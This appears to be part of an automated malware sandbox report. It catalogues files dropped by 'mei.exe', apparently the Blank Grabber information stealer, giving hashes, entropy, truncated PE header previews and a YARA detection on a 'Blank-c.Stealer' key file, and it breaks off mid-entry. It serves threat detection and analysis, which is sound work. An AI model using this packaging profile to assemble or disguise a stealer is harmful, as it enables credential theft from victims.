                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./',.kFB.kFB.kFB.b>..yFB..:C.iFB..:G.gFB..:F.cFB..:A.oFB.kFC..FB. >C.`FB.;A.KFB.;F..EB.;B.jFB.;..jFB.;@.jFB.RichkFB.........................PE..d...x..e.........." ...#. .......`9.0{O..p9.................................. R...........`......................................... .O......O.h.....O.......K.\.............R.......................................O.@...........................................UPX0.....`9.............................UPX1..... ...p9.....................@....rsrc.........O.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\libffi-8.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):29968
                                                                                                                                                                    Entropy (8bit):7.677818197322094
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
                                                                                                                                                                    MD5:08B000C3D990BC018FCB91A1E175E06E
                                                                                                                                                                    SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
                                                                                                                                                                    SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
                                                                                                                                                                    SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\libssl-3.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):229144
                                                                                                                                                                    Entropy (8bit):7.930038440560372
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:SFfmvsqWLSCMT+MyN6Qp2oZqpN+/fvrqknqbf6CjaBGkfPkZAK1ck2kBVfLwOmFd:SFevsT9JN+vyH1nqLr3CPrYBBRcd
                                                                                                                                                                    MD5:6EDA5A055B164E5E798429DCD94F5B88
                                                                                                                                                                    SHA1:2C5494379D1EFE6B0A101801E09F10A7CB82DBE9
                                                                                                                                                                    SHA-256:377DA6175C8A3815D164561350AE1DF22E024BC84C55AE5D2583B51DFD0A19A8
                                                                                                                                                                    SHA-512:74283B4051751F9E4FD0F4B92CA4B953226C155FE4730D737D7CE41A563D6F212DA770E96506D1713D8327D6FEF94BAE4528336EBCFB07E779DE0E0F0CB31F2E
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T..T..T..].3.Z....V......V....X....\....P....W..T..I....e....U.._.U....U..RichT..........PE..d......e.........." ...#.....P...p...r....................................................`............................................,C......8............ ..pM...................................................~..@...........................................UPX0.....p..............................UPX1................................@....rsrc....P.......L..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\python311.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1705240
                                                                                                                                                                    Entropy (8bit):7.993600008484676
                                                                                                                                                                    Encrypted:true
                                                                                                                                                                    SSDEEP:24576:qJY99sOZi/8N8C1CSIJyR4ZRE1Rqq/uQivcHe2Bg5Cmek5CP7uP6zohpLGLZFkh2:FjZiEN8p6ivZUHe2BgcpP7uaor6
                                                                                                                                                                    MD5:0B66C50E563D74188A1E96D6617261E8
                                                                                                                                                                    SHA1:CFD778B3794B4938E584078CBFAC0747A8916D9E
                                                                                                                                                                    SHA-256:02C665F77DB6B255FC62F978AEDBE2092B7EF1926836290DA68FD838DBF2A9F2
                                                                                                                                                                    SHA-512:37D710CB5C0CEB5957D11B61684CFBC65951C1D40AB560F3F3CB8FECA42F9D43BD981A0FF44C3CB7562779264F18116723457E79E0E23852D7638B1A954A258F
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... ..qN.qN.qN.$.O.qN.$...qN.$.K.qN.$.J.qN.$.M.qN....qN...O.qN.qO..pN.B.C.]qN.B.N.qN.B...qN.B.L.qN.Rich.qN.........PE..d......e.........." ...#..........D...]...D...................................^...........`.........................................H.].......].......].......V../..........(.^.......................................].@...........................................UPX0......D.............................UPX1..........D.....................@....rsrc.........].....................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):630736
                                                                                                                                                                    Entropy (8bit):6.409476333013752
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                                    MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                    SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                    SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                    SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\rarreg.key

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):456
                                                                                                                                                                    Entropy (8bit):4.447296373872587
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                    MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                    SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                    SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                                    SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rarreg.key, Author: Joe Security
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\select.pyd

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):26392
                                                                                                                                                                    Entropy (8bit):7.44233047444268
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:oUAW1guHrh0h1d4NZa7gJXZjNIVQG86lHQIYiSy1pCQfwug+AM+o/8E9VF0NyciC:ojW1JVpJjNIVQG8S5YiSyv3g+AMxkEdC
                                                                                                                                                                    MD5:1E9E36E61651C3AD3E91ABA117EDC8D1
                                                                                                                                                                    SHA1:61AB19F15E692704139DB2D7FB3AC00C461F9F8B
                                                                                                                                                                    SHA-256:5A91BA7EA3CF48033A85247FC3B1083F497BC060778DCF537CA382A337190093
                                                                                                                                                                    SHA-512:B367E00E1A8A3E7AF42D997B59E180DFCA7E31622558398C398F594D619B91CEDC4879BFDDA303D37F31DFCC3447FAA88F65FD13BAC109889CEE8C1E3C1D62D0
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........t.q|'.q|'.q|'...'.q|'q.}&.q|'q.y&.q|'q.x&.q|'q..&.q|'..}&.q|'.q}'.q|'..}&.q|'..q&.q|'..|&.q|'...'.q|'..~&.q|'Rich.q|'........PE..d......e.........." ...#.0................................................................`......................................... ...L....................`..............l...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\sqlite3.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):637720
                                                                                                                                                                    Entropy (8bit):7.993300822314004
                                                                                                                                                                    Encrypted:true
                                                                                                                                                                    SSDEEP:12288:NevMEHnoed8VDT4Rc+iHsLG56RY+hPQHAnxeIglZsk2F24ZHL2Ubsi2V4G2:N8oy8x4Rl1dRnxeDlZxsl2MsDVr2
                                                                                                                                                                    MD5:C78FAB9114164AC981902C44D3CD9B37
                                                                                                                                                                    SHA1:CB34DFF3CF82160731C7DA5527C9F3E7E7F113B7
                                                                                                                                                                    SHA-256:4569ACFA25DDA192BECDA0D79F4254CE548A718B566792D73C43931306CC5242
                                                                                                                                                                    SHA-512:BF82CCC02248BE669FE4E28D8342B726CF52C4EC2BFE2EC1F71661528E2D8DF03781AE5CCF005A6022D59A90E36CEA7D3C7A495BD11BF149319C891C00AC669B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W..W..W..^.P.[....U....Z...._.....S.....T..W........V.....V....<.V......V..RichW..........................PE..d......e.........." ...#.`...0.......*.......................................p............`..........................................K..."...H.......@.......................m.......................................7..@...........................................UPX0....................................UPX1.....`.......Z..................@....rsrc....0...@.......^..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\ucrtbase.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1124744
                                                                                                                                                                    Entropy (8bit):6.664084865885705
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:JJG9DZM19A7ieC9dQ8dDtLV8+BaC6EOx/cEz5RmxvSZX0ypHNHe:e/qtvdhq+BaPHxxd0
                                                                                                                                                                    MD5:8F53604F28132832353C099FADB2A54C
                                                                                                                                                                    SHA1:7679E25D80E7D551C390E6AC6F7561BF2368F734
                                                                                                                                                                    SHA-256:5D652E1BA943587035B573E0DBCDC8A2F114030AC5CAE4894805CC228DDA3D22
                                                                                                                                                                    SHA-512:5B7E3775A0ECA8ADE32E092287342F20C80BA3F96CE2008EFF5A68E0AC952087F4A19CA5F6A7BF1E3A8ADD8AED49EC8168238461F777445104BAE9D89B99A43A
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7=iNVS:NVS:NVS:G..:{VS:NVR:.VS:...:OVS:..S;OVS:..P;}VS:..V;.VS:..W;.VS:..];wTS:...:OVS:..Q;OVS:RichNVS:........PE..d....#j..........." .....0...........w..............................................f.....`A................................................................. ..0........)......$...0...p............................Z..@..............(............................text...e%.......0.................. ..`.rdata......@.......@..............@..@.data....&....... ..................@....pdata..0.... ......................@..@.rsrc...............................@..@.reloc..$...........................@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\unicodedata.pyd

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):302872
                                                                                                                                                                    Entropy (8bit):7.986782854548308
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:Kk/Qvs7yfQJYx4x9UVqHDMDNCStEQc5YmDp9KiQ/y:KkUfQJbUV2MhCwEQc5Np9zQ6
                                                                                                                                                                    MD5:AF87B4AA3862A59D74FF91BE300EE9E3
                                                                                                                                                                    SHA1:E5BFD29F92C28AFA79A02DC97A26ED47E4F199B4
                                                                                                                                                                    SHA-256:FAC71C7622957FE0773214C7432364D7FC39C5E12250FF9EAAEEA4D897564DC7
                                                                                                                                                                    SHA-512:1FB0B8100DFFD18C433C4AA97A4F2DA76FF6E62E2EF2139EDC4F98603BA0BB1C27B310B187B5070CF4E892FFC2D09661A6914DEFA4509C99B60BCBB50F70F4A0
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4m..4m..4m..=...2m......6m......9m......<m......7m......7m......6m..4m..em......5m......5m....j.5m......5m..Rich4m..................PE..d......e.........." ...#.`.......@.......P................................................`.............................................X....................P..0.......................................................@...........................................UPX0.....@..............................UPX1.....`...P...^..................@....rsrc................b..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0j01yh2b.wfd.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22400yzc.5xa.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2jbteg4u.uki.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2otofyrs.zd2.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2wmuwwhx.zsg.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3eghtsnw.hw4.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5wmutwot.zj1.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwz24sxo.so5.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_furtfq5w.jzd.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hgrvu1dg.rzp.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ihaskjv4.jil.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j1nw3tn4.jlx.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
